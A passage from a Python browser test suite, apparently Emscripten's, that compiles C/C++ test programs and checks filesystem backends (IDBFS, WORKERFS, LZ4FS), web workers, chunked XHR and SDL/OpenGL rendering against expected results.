self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-lidbfs.js', '-s', 'NO_EXIT_RUNTIME=0']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_fs_memfs_fsync(self):
args = ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'NO_EXIT_RUNTIME=0']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
open(self.in_dir('pre.js'), 'w').write('''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
open('file1.txt', 'w').write('first')
if not os.path.exists('sub'):
os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
Popen([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js']).communicate()
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
self.clear()
os.mkdir('subdir')
open('file1.txt', 'w').write('0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'], timeout=60)
assert os.stat('file1.txt').st_size + os.stat(os.path.join('subdir', 'file2.txt')).st_size + os.stat('file3.txt').st_size == 3 * 1024 * 128 * 10 + 1
assert os.stat('test.data').st_size < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'], timeout=60)
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'], timeout=60)
'''# non-lz4 for comparison
try:
os.mkdir('files')
except:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'], timeout=60)'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
open('data.dat', 'w').write(' ')
run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'])
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17')
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
@requires_graphics_hardware
def test_egl(self):
open(os.path.join(self.get_dir(), 'test_egl.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl.c'), '-o', 'page.html', '-lEGL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html', '-lEGL', '-lGL']).communicate()
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def do_test_worker(self, args=[]):
# Test running in a web worker
open('file.dat', 'w').write('data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.test_port)
html_file.close()
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
assert os.path.exists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20|' + ('data%20for%20w' if file_data else '') + '|')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.test_port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
run_process([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.test_port))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(30, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut'] + (['--proxy-to-worker'] if proxy else []), timeout=30)
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else [])).communicate()
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')),
args=args,
timeout=30)
@requires_graphics_hardware
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1', '-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
def test_emscripten_api(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
open('script1.js', 'w').write('''
Module._set(456);
''')
open('file1.txt', 'w').write('first')
open('file2.txt', 'w').write('second')
setup()
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
Popen([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'NO_EXIT_RUNTIME=0']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
def test_emscripten_main_loop_settimeout(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_textures(self):
self.btest('gl_textures.cpp', '0', args=['-lGL'])
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
